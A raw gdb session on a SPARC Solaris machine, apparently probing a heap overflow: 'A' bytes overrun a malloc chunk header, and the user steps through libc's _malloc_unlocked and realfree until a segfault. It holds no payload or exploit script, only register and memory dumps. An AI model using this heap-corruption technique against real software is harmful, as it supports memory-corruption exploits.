g6 0x0 0
g7 0x0 0
o0 0x1ff0 8176
o1 0xff33c008 -13385720
o2 0x0 0
o3 0x0 0
o4 0x20a38 133688
o5 0x2000 8192
sp 0xffbeeeb8 4290703032
o7 0xff2c1fbc -13885508
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x320 800
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x320 800
i4 0x20a38 133688
i5 0x0 0
fp 0xffbeef18 4290703128
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000006 -33554426 icc:----, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fdc 4281081820
npc 0xff2c1fe0 -13885472
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x22a28 141864
o1 0xff33c008 -13385720
o2 0x0 0
o3 0x0 0
o4 0x20a38 133688
o5 0x2000 8192
sp 0xffbeeeb8 4290703032
o7 0xff2c1fbc -13885508
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x320 800
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x320 800
i4 0x20a38 133688
i5 0x0 0
fp 0xffbeef18 4290703128
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000006 -33554426 icc:----, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/x 0x22a30
0x22a30: 0x00000001
(gdb) x/x 0x22a28
0x22a28: 0x00000000
(gdb) p/x p
No symbol "p" in current context.
(gdb) info proc map
process 26445 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTTRACE: Trace trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x11fff 0x2000 0 ----r-x
0x20000 0x21fff 0x2000 0 ----rwx
0x22000 0x23fff 0x2000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
(gdb) x/96x 0x22000
0x22000: 0x00000000 0x00000000 0x00000000 0x00000000
0x22010: 0x00000000 0x00000000 0x00000000 0x00000000
0x22020: 0x00000000 0x00000000 0x00000000 0x00000000
0x22030: 0x00000000 0x00000000 0x00000000 0x00000000
0x22040: 0x00000000 0x00000000 0x00000000 0x00000000
0x22050: 0x00000000 0x00000000 0x00000000 0x00000000
0x22060: 0x00000000 0x00000000 0x00000000 0x00000000
0x22070: 0x00000000 0x00000000 0x00000000 0x00000000
0x22080: 0x00000000 0x00000000 0x00000000 0x00000000
0x22090: 0x00000000 0x00000000 0x00000000 0x00000000
0x220a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22100: 0x00000000 0x00000000 0x00000000 0x00000000
0x22110: 0x00000000 0x00000000 0x00000000 0x00000000
0x22120: 0x00000000 0x00000000 0x00000000 0x00000000
0x22130: 0x00000000 0x00000000 0x00000000 0x00000000
0x22140: 0x00000000 0x00000000 0x00000000 0x00000000
0x22150: 0x00000000 0x00000000 0x00000000 0x00000000
0x22160: 0x00000000 0x00000000 0x00000000 0x00000000
0x22170: 0x00000000 0x00000000 0x00000000 0x00000000
0x23750: 0x00000000 0x00000000 0x00000000 0x00000000
0x23760: 0x00000000 0x00000000 0x00000000 0x00000000
0x23770: 0x00000000 0x00000000 0x00000000 0x00000000
0x23780: 0x00000000 0x00000000 0x00000000 0x00000000
0x23790: 0x00000000 0x00000000 0x00000000 0x00000000
0x237a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23800: 0x00000000 0x00000000 0x00000000 0x00000000
0x23810: 0x00000000 0x00000000 0x00000000 0x00000000
0x23820: 0x00000000 0x00000000 0x00000000 0x00000000
0x23830: 0x00000000 0x00000000 0x00000000 0x00000000
0x23840: 0x00000000 0x00000000 0x00000000 0x00000000
0x23850: 0x00000000 0x00000000 0x00000000 0x00000000
0x23860: 0x00000000 0x00000000 0x00000000 0x00000000
0x23870: 0x00000000 0x00000000 0x00000000 0x00000000
0x23880: 0x00000000 0x00000000 0x00000000 0x00000000
0x23890: 0x00000000 0x00000000 0x00000000 0x00000000
0x238a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23900: 0x00000000 0x00000000 0x00000000 0x00000000
0x23910: 0x00000000 0x00000000 0x00000000 0x00000000
0x23920: 0x00000000 0x00000000 0x00000000 0x00000000
0x23930: 0x00000000 0x00000000 0x00000000 0x00000000
0x23940: 0x00000000 0x00000000 0x00000000 0x00000000
0x23950: 0x00000000 0x00000000 0x00000000 0x00000000
0x23960: 0x00000000 0x00000000 0x00000000 0x00000000
0x23970: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23980: 0x00000000 0x00000000 0x00000000 0x00000000
0x23990: 0x00000000 0x00000000 0x00000000 0x00000000
0x239a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23aa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23af0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23be0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23df0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ef0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x24000: Cannot access memory at address 0x24000
(gdb)
0x24004: Cannot access memory at address 0x24004
(gdb)
0x24008: Cannot access memory at address 0x24008
(gdb) c
Continuing.
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:3
3 char *penis = malloc(300);
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) x/96x 0x22000
0x22a20: 0x00000000 0x00000000 0x00020d60 0x00000000
0x22a30: 0x00000003 0x00000000 0x00000000 0x00000000
0x23c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23df0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ef0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x24000: Cannot access memory at address 0x24000
(gdb)
0x24004: Cannot access memory at address 0x24004
(gdb)
0x24008: Cannot access memory at address 0x24008
(gdb) x/96x 0x20d60
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ed0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/96x 0x20d40
0x20d40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) si
0xff2c1d90 in malloc () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0x21000 135168
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeeea0 4290703008
o7 0xff2c1d8c -13886068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbeef00 4290703104
i7 0x10724 67364
y 0x0 0
psr 0xfe400006 -29360122 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1d90 4281081232
npc 0xff2c1d94 -13886060
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1d90 <malloc+8>: sethi %hi(0x7a000), %o1
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1dcc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1dcc <_malloc_unlocked+8>: call 0xff2c1dd4 <_malloc_unlocked+16>
0xff2c1dd0 <_malloc_unlocked+12>: sethi %hi(0x7a000), %o1
0xff2c1dd4 <_malloc_unlocked+16>: add %o0, 0x3e7, %o0
0xff2c1dd8 <_malloc_unlocked+20>: cmp %i0, %o0
0xff2c1ddc <_malloc_unlocked+24>: add %o1, 0x23c, %o1
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
(gdb) c
Continuing.
Breakpoint 5, 0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x41022a28 1090660904
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe900003 -24117245 icc:N--C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/i $pc
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
(gdb) x/i $pc-4
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
(gdb) x/x 0x22a28
0x22a28: 0x00020d60
(gdb) set $o0 = 0x22a28
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x22a28 141864
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe900003 -24117245 icc:N--C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
0xff2c2004 <_malloc_unlocked+576>: add %i4, %i3, %o0
(gdb) si
0xff2c1fe4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fe8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ff8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ffc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2000 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2004 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2008 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c200c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2010 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2014 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c240c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2410 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2414 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2418 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c241c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2420 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2424 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2428 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c242c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2430 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2434 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2438 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c243c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2444 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2448 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c244c in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2474 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2478 in realfree () from /usr/lib/libc.so.1
(gdb)
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb)
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
The program is not being run.
(gdb) x/x 0xff2c247c
0xff2c247c <realfree+112>: Cannot access memory at address 0xff2c247c
(gdb) r
